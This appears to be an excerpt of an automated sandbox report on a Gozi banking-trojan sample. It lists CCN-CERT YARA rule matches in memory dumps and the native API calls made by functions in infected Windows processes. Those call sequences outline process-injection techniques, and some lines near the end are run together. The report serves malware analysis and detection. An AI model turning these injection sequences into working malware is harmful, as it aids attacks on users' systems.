          Source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY | Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013E3373
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013E294D
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013EB084
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_010298C2
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_010460F4
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_01035B0C
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_010353A6
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_01027A06
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_010492C4
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_010262CD
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_01021D4F
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_01034F12
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0102366D
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_01031690
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013A0DF9
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013A0DF7
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_049DB084
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_049D294D
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_049D3373
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_030E0DF9
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_030E0DF7
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053C1D4F
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053D4F12
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053C366D
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053D1690
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053E60F4
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053C98C2
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053D5B0C
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053D53A6
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053C7A06
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053C62CD
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053E92C4
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_006D0DF9
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_006D0DF7
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AA1D4F
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AB1690
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AA366D
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AB4F12
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AC60F4
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AA98C2
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AA62CD
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AC92C4
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AA7A06
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AB53A6
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AB5B0C
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_02B9B084
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_02B93373
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_02B9294D
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_02BF0DF9
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_02BF0DF7
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C21D4F
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C31690
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C2366D
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C34F12
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C298C2
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C460F4
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C492C4
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C262CD
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C27A06
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C353A6
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C35B0C
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E2F83C
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E3A2AC
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E29CD4
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E258F8
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E268CC
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E3C094
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E2F074
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E32844
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E1C85C
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E1E028
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E26028
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E2D9D4
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E3B984
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E37160
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E2A120
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E23A7C
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E20210
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E193D0
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E3CB9C
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E21B60
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E11B44
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E3EB2C
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E1C30C
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E38CE4
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E134F4
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E2DCBC
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E24C84
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E2B408
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E1C5EC
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E335C4
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E24D80
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E3159C
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E35D64
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E2457C
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E3FEE8
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E296D0
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E236D4
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E2A6A4
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E13EB8
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E1B60C
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E1BE10
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E40F98
          Source: C:\Windows\System32\control.exe | Code function: 42_2_00E37F9C
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E1F83C
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E2A2AC
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E19CD4
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E158F8
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E168CC
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E2C094
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E1F074
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E22844
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E0C85C
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E0E028
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E16028
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E1D9D4
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E2B984
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E27160
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E1A120
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E13A7C
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E10210
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E093D0
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E2CB9C
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E11B60
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E01B44
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E2EB2C
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E0C30C
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E28CE4
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E034F4
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E1DCBC
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E14C84
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E1B408
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E0C5EC
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E235C4
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E14D80
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E2159C
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E25D64
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E1457C
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E2FEE8
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E196D0
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E136D4
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E1A6A4
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E03EB8
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E0B60C
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E0BE10
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E30F98
          Source: C:\Windows\System32\control.exe | Code function: 43_2_00E27F9C
          Source: C:\Windows\System32\control.exe | Code function: 45_2_0083F83C
          Source: C:\Windows\System32\control.exe | Code function: 45_2_0084A2AC
          Source: C:\Windows\System32\control.exe | Code function: 45_2_00839CD4
          Source: C:\Windows\System32\control.exeCode function: 45_2_0084C09445_2_0084C094
          Source: C:\Windows\System32\control.exeCode function: 45_2_008368CC45_2_008368CC
          Source: C:\Windows\System32\control.exeCode function: 45_2_008358F845_2_008358F8
          Source: C:\Windows\System32\control.exeCode function: 45_2_0082E02845_2_0082E028
          Source: C:\Windows\System32\control.exeCode function: 45_2_0083602845_2_00836028
          Source: C:\Windows\System32\control.exeCode function: 45_2_0084284445_2_00842844
          Source: C:\Windows\System32\control.exeCode function: 45_2_0082C85C45_2_0082C85C
          Source: C:\Windows\System32\control.exeCode function: 45_2_0083F07445_2_0083F074
          Source: C:\Windows\System32\control.exeCode function: 45_2_0084B98445_2_0084B984
          Source: C:\Windows\System32\control.exeCode function: 45_2_0083D9D445_2_0083D9D4
          Source: C:\Windows\System32\control.exeCode function: 45_2_0083A12045_2_0083A120
          Source: C:\Windows\System32\control.exeCode function: 45_2_0084716045_2_00847160
          Source: C:\Windows\System32\control.exeCode function: 45_2_0083021045_2_00830210
          Source: C:\Windows\System32\control.exeCode function: 45_2_00833A7C45_2_00833A7C
          Source: C:\Windows\System32\control.exeCode function: 45_2_0084CB9C45_2_0084CB9C
          Source: C:\Windows\System32\control.exeCode function: 45_2_008293D045_2_008293D0
          Source: C:\Windows\System32\control.exeCode function: 45_2_0082C30C45_2_0082C30C
          Source: C:\Windows\System32\control.exeCode function: 45_2_0084EB2C45_2_0084EB2C
          Source: C:\Windows\System32\control.exeCode function: 45_2_00821B4445_2_00821B44
          Source: C:\Windows\System32\control.exeCode function: 45_2_00831B6045_2_00831B60
          Source: C:\Windows\System32\control.exeCode function: 45_2_00834C8445_2_00834C84
          Source: C:\Windows\System32\control.exeCode function: 45_2_0083DCBC45_2_0083DCBC
          Source: C:\Windows\System32\control.exeCode function: 45_2_00848CE445_2_00848CE4
          Source: C:\Windows\System32\control.exeCode function: 45_2_008234F445_2_008234F4
          Source: C:\Windows\System32\control.exeCode function: 45_2_0083B40845_2_0083B408
          Source: C:\Windows\System32\control.exeCode function: 45_2_00834D8045_2_00834D80
          Source: C:\Windows\System32\control.exeCode function: 45_2_0084159C45_2_0084159C
          Source: C:\Windows\System32\control.exeCode function: 45_2_008435C445_2_008435C4
          Source: C:\Windows\System32\control.exeCode function: 45_2_0082C5EC45_2_0082C5EC
          Source: C:\Windows\System32\control.exeCode function: 45_2_00845D6445_2_00845D64
          Source: C:\Windows\System32\control.exeCode function: 45_2_0083457C45_2_0083457C
          Source: C:\Windows\System32\control.exeCode function: 45_2_0083A6A445_2_0083A6A4
          Source: C:\Windows\System32\control.exeCode function: 45_2_00823EB845_2_00823EB8
          Source: C:\Windows\System32\control.exeCode function: 45_2_008396D045_2_008396D0
          Source: C:\Windows\System32\control.exeCode function: 45_2_008336D445_2_008336D4
          Source: C:\Windows\System32\control.exeCode function: 45_2_0084FEE845_2_0084FEE8
          Source: C:\Windows\System32\control.exeCode function: 45_2_0082B60C45_2_0082B60C
          Source: C:\Windows\System32\control.exeCode function: 45_2_0082BE1045_2_0082BE10
          Source: C:\Windows\System32\control.exeCode function: 45_2_00847F9C45_2_00847F9C
          Source: C:\Windows\System32\control.exeCode function: 45_2_00850F9845_2_00850F98
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_01038A31 CreateProcessAsUserW
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013E7562 GetProcAddress,NtCreateSection,memset
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013E65B4 NtMapViewOfSection
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013E6C06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013EB2A9 NtQueryVirtualMemory
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_010309CA NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0103D9F4 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0102B0A5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0103C51B memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0102D551 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_01044582 NtQueryInformationProcess
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_01024D95 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_010467CD GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_01044FEA NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_01031635 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0103963A GetProcAddress,NtCreateSection,memset
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_01023EB7 NtMapViewOfSection
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0102D049 NtGetContextThread,RtlNtStatusToDosError
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0103C0B8 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0102C0CF memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0102B8F7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_01042CA5 memset,NtQueryInformationProcess
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0103CFE8 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_01027E6C NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_01029690 NtQuerySystemInformation,RtlNtStatusToDosError
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013A08B7 NtAllocateVirtualMemory
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013A0880 NtAllocateVirtualMemory
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013A0ABA NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_049D6C06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_049D65B4 NtMapViewOfSection
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_049D7562 GetProcAddress,NtCreateSection,memset
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_049DB2A9 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_030E0880 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_030E0ABA NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_030E08B7 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053DC51B memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053CD551 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053C4D95 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053E4582 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053E4FEA NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053E67CD GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053D963A GetProcAddress,NtCreateSection,memset
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053D1635 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053C3EB7 NtMapViewOfSection
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053DD9F4 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053D09CA NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053CB0A5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053E2CA5 memset,NtQueryInformationProcess
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053DCFE8 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053C7E6C NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053C9690 NtQuerySystemInformation,RtlNtStatusToDosError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053CD049 NtGetContextThread,RtlNtStatusToDosError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053DC0B8 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053CB8F7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053CC0CF memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_006D0ABA NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_006D08B7 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_006D0880 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AC4582 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AA4D95 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04ABC51B memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AB1635 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AC67CD GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AAB0A5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04ABD9F4 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AC2CA5 memset,NtQueryInformationProcess
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AA9690 NtQuerySystemInformation,RtlNtStatusToDosError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AA7E6C NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04ABCFE8 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AC4FEA NtWriteVirtualMemory,VirtualProtectEx,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04ABC0B8 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AAB8F7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AAC0CF memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AAD049 NtGetContextThread,RtlNtStatusToDosError
